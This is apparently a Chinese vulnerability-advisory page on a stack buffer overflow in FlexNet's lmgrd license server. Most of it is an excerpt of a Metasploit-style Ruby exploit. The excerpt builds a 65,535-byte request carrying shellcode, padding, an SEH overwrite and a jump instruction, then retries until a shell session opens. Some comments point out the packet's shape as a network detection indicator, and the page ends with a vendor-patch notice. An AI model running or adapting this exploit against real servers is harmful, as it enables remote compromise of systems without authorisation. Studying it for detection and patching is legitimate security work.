FlexNet License Server Manager 'lmgrd' 组件栈缓冲区溢出(3)

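# Runs the exploit attempt loop: calls do_exploit up to datastore['Attempts']
# times, pausing datastore['Wait'] seconds after each try, and stops early as
# soon as session_created? reports a session. Prints an error if no session
# exists once the loop finishes.
def exploit
    # Counts attempts actually made. The original reported its 1-based loop
    # index, which is one past the number of attempts once the loop exhausts.
    attempts_made = 0
    while attempts_made < datastore['Attempts'] && !session_created?
      attempts_made += 1
      print_status("Attempt #{attempts_made}/#{datastore['Attempts']} to exploit...")
      do_exploit
      # The pause runs after every attempt, including the last one, before
      # session_created? is checked again.
      sleep(datastore['Wait'])
    end

    unless session_created?
      print_error("Exploit didn't work after #{attempts_made} attempts")
    end
  end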

# Performs a single attempt: builds one request body, wraps it with
# create_packet, and sends it over a fresh connection.
#
# Relies on helpers that are not visible in this excerpt (jam, create_packet,
# generate_seh_record, connect, sock, handler, disconnect, target, payload).
#
# NOTE(review), for detection: in both branches below pkt_data ends up exactly
# (65535 - header_length) bytes long and consists mostly of long runs of a
# single repeated byte ('a', 'b', 'c'). An lmgrd request of that size and
# shape is a usable network indicator; confirm the on-wire framing against
# create_packet, which is not shown here.
def do_exploit
    # Starts the jam helper on a framework-managed thread. The handle `t` is
    # not used again in this method; what jam does is not visible here.
    t = framework.threads.spawn("jam", false) { jam }
    my_payload = payload.encoded

header_length = 20 # See create_packet() to understand this number
    pkt_data = ""
    if target.name =~ /Debug/
      # Debug targets: filler only, no payload; the request is just oversized.
      pkt_data << "a" * (65535 - header_length)
    else
      # Layout is driven by per-target values ('ShellcodeOffset', 'Offset',
      # ret) defined in the module's target table, which is outside this excerpt.
      pkt_data << "a" * (target['ShellcodeOffset'])
      pkt_data << my_payload
      # Pads from the end of the payload up to target['Offset'].
      pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
      pkt_data << generate_seh_record(target.ret)
      # Appends the encoded bytes of a single assembled x86 instruction.
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
      # Trailing filler brings the data to the same fixed size as the Debug branch.
      pkt_data << "c" * (65535 - pkt_data.length - header_length)
    end

pkt = create_packet(pkt_data)

# One connection per attempt: connect, send the single packet, call handler,
# then disconnect.
connect
    sock.put(pkt)
    handler
    disconnect
  end

end

建议:
--------------------------------------------------------------------------------
厂商补丁:

Flexera
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商(Flexera)的主页下载补丁并升级。
